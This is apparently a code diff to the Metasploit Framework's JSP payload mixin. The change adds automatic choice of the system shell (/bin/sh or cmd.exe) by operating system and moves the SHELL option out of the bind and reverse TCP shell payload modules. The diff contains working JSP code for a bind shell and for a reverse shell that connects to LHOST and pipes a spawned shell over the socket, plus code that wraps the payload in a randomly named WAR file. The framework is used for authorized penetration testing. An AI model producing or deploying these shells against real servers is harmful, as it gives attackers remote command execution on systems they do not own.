Allow Msf::Payload::JSP to guess system shell path if it isnt provided

lib/msf/core/payload/jsp.rb

@@ -2,8 +2,23 @@
 require 'msf/core'
 require 'rex'
 
+# This module is chained within JSP payloads that target the Java platform.
+# It provides methods to generate Java / JSP code.
 module Msf::Payload::JSP
+
+  # @param attributes [Hash{Symbol => String,nil}]
+  def initialize(info = {})
+    ret = super(info)
+
+    register_options([
+      Msf::OptString.new( 'SHELL', [false, 'The system shell to use.'])
+    ], Msf::Payload::JSP )
+
+    ret
+  end
+
   # Outputs jsp that spawns a bind TCP shell
+  #
   # @return [String] jsp code that executes bind TCP payload
   def jsp_bind_tcp
     # Modified from: http://www.security.org.sg/code/jspreverse.html
@@ -53,10 +68,11 @@ module Msf::Payload::JSP
 
   try
   {
+    #{shell_path}
     ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
     Socket client_socket = server_socket.accept();
     server_socket.close();
-    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    Process process = Runtime.getRuntime().exec( ShellPath );
     ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
     ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
   } catch( Exception e ) {}
@@ -67,6 +83,7 @@ module Msf::Payload::JSP
   end
 
   # Outputs jsp code that spawns a reverse TCP shell
+  #
   # @return [String] jsp code that executes reverse TCP payload
   def jsp_reverse_tcp
     # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
@@ -116,8 +133,9 @@ module Msf::Payload::JSP
 
   try
   {
+    #{shell_path}
     Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
-    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    Process process = Runtime.getRuntime().exec( ShellPath );
     ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
     ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
   } catch( Exception e ) {}
@@ -127,6 +145,7 @@ module Msf::Payload::JSP
   end
 
   # Wraps the jsp payload into a war
+  #
   # @return [Rex::Zip::Jar] a war to execute the jsp payload
   def generate_war
     jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
@@ -151,4 +170,28 @@ module Msf::Payload::JSP
 
     zip
   end
+
+  # Outputs Java code to assign the system shell path to a variable.
+  #
+  # It uses the datastore if a value has been provided, otherwise
+  # tries to guess the system shell path bad on the os target.
+  #
+  # @return [String] the Java code.
+  def shell_path
+    if datastore['SHELL'] && !datastore['SHELL'].empty?
+      jsp =  "String ShellPath = \"#{datastore['SHELL']}\";"
+    else
+      jsp = <<-EOS
+String ShellPath;
+if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+  ShellPath = new String("/bin/sh");
+} else {
+  ShellPath = new String("cmd.exe");
+}
+      EOS
+    end
+
+    jsp
+  end
+
 end

modules/payloads/singles/java/jsp_shell_bind_tcp.rb

@@ -31,7 +31,6 @@ module Metasploit3
           'Payload' => ''
         }
       ))
-    register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
   end
 
 

modules/payloads/singles/java/jsp_shell_reverse_tcp.rb

@@ -31,7 +31,6 @@ module Metasploit3
           'Payload' => ''
         }
       ))
-    register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
   end